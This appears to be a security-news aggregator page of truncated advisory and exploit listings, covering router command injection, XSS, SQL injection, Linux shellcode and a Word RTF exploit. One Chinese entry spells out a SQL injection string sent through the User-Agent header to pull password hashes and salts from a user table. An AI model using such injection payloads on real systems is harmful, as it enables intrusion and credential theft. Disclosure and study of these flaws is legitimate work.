Google Chrome Silently Listening to Your Private Conversations

Google was under fire of downloading and installing a Chrome extension surreptitiously and subsequently listened to the conversations of Chromium users without consent. After these accusations, a wave of criticism by privacy campaigners and open source developers has led Google to remove the...

VBScan - An Black Box vBulletin Vulnerability Scanner

VBScan is a Black Box vBulletin vulnerability scanner. Written in Perl Demo on youtube: Security Bug Found by VBScan in Ubuntu / Fedora/ python forums by VBScan Vulnerability Scanner Report any bug to : [email protected] Download VBScan...

linux/x86 seanux-a 1.0 execve shellcode - 80 bytes

seanux-a Linux distribution is an operating system made as a collection of software based around the Linux kernel and often around a package management system. Most distributions come ready to use and pre-compiled for a specific instruction set, while others are distributed in source code form an...

DreamBox DM500s Cross Site Scripting

DreamBox DM500s Reflected XSS Vendor: Dream Multimedia GmbH Product web page: http://www.dream-multimedia-tv.de Summary: The Dreambox DM500s is a Linux-powered DVB satellite, terrestrial and cable digital television receivers set-top box. Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma...

MS KB3062760: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (FREAK)

The remote Windows host is missing KB3062760, which resolves multiple OpenSSL vulnerabilities in the Juniper Networks Windows In-Box Junos Pulse client shipped with Windows 8.1 : - A flaw exists with ECDH handshakes when using an ECDSA certificate without a ServerKeyExchange message. This allows ...

AVM Fritz!Box Arbitrary Command Execution Vulnerability

AVM Fritz!Box is a router product from the German company AVM. The AVM Fritz!Box cgi-bin/webcm URI fails to adequately filter shell metacharacters in the 'var:lang' parameter, presenting an arbitrary command execution vulnerability that could be exploited by a remote attacker to submit a special...

CVE-2014-9727

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm...

Design/Logic Flaw

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm...

CVE-2014-9727

The CVE-2014-9727 issue affects AVM Fritz!Box routers, where the CGI endpoint cgi-bin/webcm accepts the var:lang parameter and does not properly filter shell metacharacters, enabling remote command execution. Impact is remote, unauthenticated command execution against affected devices, with shell...

CVE-2014-9727

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm...

PT-2015-4366 · Avm · Avm Fritz!Box

Name of the Vulnerable Software and Affected Versions: AVM Fritz!Box affected versions not specified Description: The issue allows remote attackers to execute arbitrary commands. This is achieved by using shell metacharacters in the var:lang parameter to the "cgi-bin/webcm" API endpoint...

CVE-2014-9727

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm. Recent assessments: Assessed Attacker Value: 0 Assessed Attacker Value: 0Assessed Attacker Value: 0...

From the client game bug looking of security risks-vulnerability warning-the black bar safety net

Although the now app development a growing trend in web applications, large-scale software also makes extensive use of the existing framework with the existing frameworks and engines improve, the vast majority of security issues have been resolved. But encountered some customization needs,...

PDF Converter & Editor 2.1 iOS - File Include Vulnerability

Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID VL-ID: ===================================...

WordPress Plugin Community Events 1.3.5 - SQL Injection

======================================================================= title: SQL Injection product: WordPress Community Events Plugin vulnerable version: 1.3.5 and probably below fixed version: 1.4 CVE number: CVE-2015-3313 impact: CVSS Base Score 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P homepage:...

Wecenter最新版注入之二（黑盒测试技巧）

简要描述： 无视GPC注入 详细说明： 设置useragent 注入语句为 ' andselect 1 fromselect count,concatselect concatpassword,0x23,salt,0x23 from awsusers limit 0,1,floorrand02x from informationschema.tables group by xa 然后挂着页面几分钟 再去访问任意页面就可以了 可以看到报错了 Database error ------ SQL: UPDATE awsusersonline SET uid = '2', lastactive ...

CVE-2 0 1 4-4 4 2 3 analysis process and findings-vulnerability warning-the black bar safety net

Primer Some time ago the“steamed rice”on his blog published the article“on a non-jailbroken iPhone 6 iOS 8.1.3 on phishing attacks stealing App Store passwords”, see the article later to try to reproduce the whole process. Since the“steamed rice”the entire process is described more clearly, combi...

Microsoft-Office-Word-2007-RTF

Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass Date : 28/02/2015 Author : R-73eN Software : Microsoft Office Word 2007 Tested : Windows 7 Starter import sys Windows Message Box / all versions shellcode =...

dedecms v5. 7 files contains lead to arbitrary code execution(tasteless into the background)-bug warning-the black bar safety net

Security box team www.secbox.cn today found the woven dream dedecms a code execution vulnerability, the vulnerability to execute arbitrary code caused getshell, the Affected versions:≤V5. 7SP1 official Edition2014-06-27 Overview: Security box team in the audit of the woven dream dedecms when foun...

Microsoft Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)

Microsoft Word 2007 - RTF Object Confusion ASLR + DEP Bypass Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass Date : 28/02/2015 Author : R-73eN Software : Microsoft Office Word 2007 Tested : Windows 7 Starter import sys Windows Message Box / all versions . Thanks to...